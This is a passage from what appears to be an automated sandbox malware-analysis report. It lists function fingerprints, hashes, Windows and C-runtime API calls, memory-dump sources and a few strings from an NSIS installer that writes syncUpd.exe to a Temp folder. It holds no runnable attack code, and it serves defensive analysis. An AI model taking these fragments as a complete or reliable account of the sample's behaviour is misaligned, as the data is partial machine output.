                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB21FCB06083059FD710AF65E58875A7FE8FB44309F40843EE4C5A72A1DB798585CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004201AC
                                                                                                                                                                                                                                                                • Part of subcall function 0041E8EC: __getptd_noexit.LIBCMT ref: 0041E8EF
                                                                                                                                                                                                                                                                • Part of subcall function 0041E8EC: __amsg_exit.LIBCMT ref: 0041E8FC
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 004201CC
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 004201DC
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0042020C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                              • String ID: /8@$}6@
                                                                                                                                                                                                                                                              • API String ID: 3170801528-2566543373
                                                                                                                                                                                                                                                              • Opcode ID: 4e877f5fdfbd5a7843aadfdca11496e6b7c2b935120cf88deeaa281316c36af8
                                                                                                                                                                                                                                                              • Instruction ID: 3421f67be82abb873178b65f0fa18ed5a2474267da0896d5093bbf8687c05708
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e877f5fdfbd5a7843aadfdca11496e6b7c2b935120cf88deeaa281316c36af8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF018271F01631DBC721AB66A80579AB3A0AF04750F85405BFC10A7282D73C5CA2DBEE
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: TextTimerWindowwsprintf
                                                                                                                                                                                                                                                              • String ID: @Vl$unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                                                              • API String ID: 2438957755-2821168704
                                                                                                                                                                                                                                                              • Opcode ID: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                                              • Instruction ID: 5883a2093b31581e9909bbd4cee83827143d54294f5a20fab69da977af55eaa0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9015EB0908304AFD710AF24D48525EBFE8EB48355F50C83EE58997281C7B895859B8A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0041FF10
                                                                                                                                                                                                                                                                • Part of subcall function 0041E8EC: __getptd_noexit.LIBCMT ref: 0041E8EF
                                                                                                                                                                                                                                                                • Part of subcall function 0041E8EC: __amsg_exit.LIBCMT ref: 0041E8FC
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0041FF27
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0041FF35
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041FF45
                                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0041FF59
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _calloc
                                                                                                                                                                                                                                                              • String ID: tl_$!@
                                                                                                                                                                                                                                                              • API String ID: 1679841372-1576196623
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                                                                                                              • String ID: ,Xl$@Vl$NSIS Software Setup
                                                                                                                                                                                                                                                              • API String ID: 530164218-621143162
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                                • Part of subcall function 00407779: CreateProcessA.KERNEL32 ref: 004077D6
                                                                                                                                                                                                                                                                • Part of subcall function 00407779: CloseHandle.KERNEL32 ref: 004077EB
                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32 ref: 00402661
                                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32 ref: 00402688
                                                                                                                                                                                                                                                                • Part of subcall function 00408848: PeekMessageA.USER32 ref: 00408878
                                                                                                                                                                                                                                                                • Part of subcall function 00408848: DispatchMessageA.USER32 ref: 00408884
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004026C8
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$CloseHandleProcess$CodeCreateDispatchExitObjectPeekSingleTextWaitWindow
                                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                                              • API String ID: 3753073698-2564639436
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,00407F99), ref: 00407B74
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32 ref: 00407BAF
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32 ref: 00407BD5
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00407B3D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                              • String ID: Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                                                                                                                                                                                                              • API String ID: 3677997916-1796041975
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041E804
                                                                                                                                                                                                                                                                • Part of subcall function 0041EF67: __mtinitlocknum.LIBCMT ref: 0041EF7D
                                                                                                                                                                                                                                                                • Part of subcall function 0041EF67: __amsg_exit.LIBCMT ref: 0041EF89
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041E825
                                                                                                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 0041E843
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __lock$___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                              • String ID: }6@
                                                                                                                                                                                                                                                              • API String ID: 2123130959-1554576116
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1437655972-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$TextWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1596935084-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Close$DeleteOpen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2349717609-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 589700163-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32 ref: 00402A22
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000), ref: 00402B6F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                                              • String ID: 4A
                                                                                                                                                                                                                                                              • API String ID: 123533781-205151761
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsWindowVisible.USER32 ref: 00406F16
                                                                                                                                                                                                                                                              • CallWindowProcA.USER32 ref: 00406FB8
                                                                                                                                                                                                                                                                • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                              • Opcode ID: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                                              • Instruction ID: 9710050d3cc87503a6e3ad62db4a5623da0bea7fc0aec59e94b28eb5e14ff036
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F212CB0908315AFE710AF15E88496FBBF8EF44718F51883EF895A7281C3795851CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • OleInitialize.OLE32(006C5640), ref: 00404C28
                                                                                                                                                                                                                                                                • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(00000000,00000000,?,?,0040651F), ref: 00404C82
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
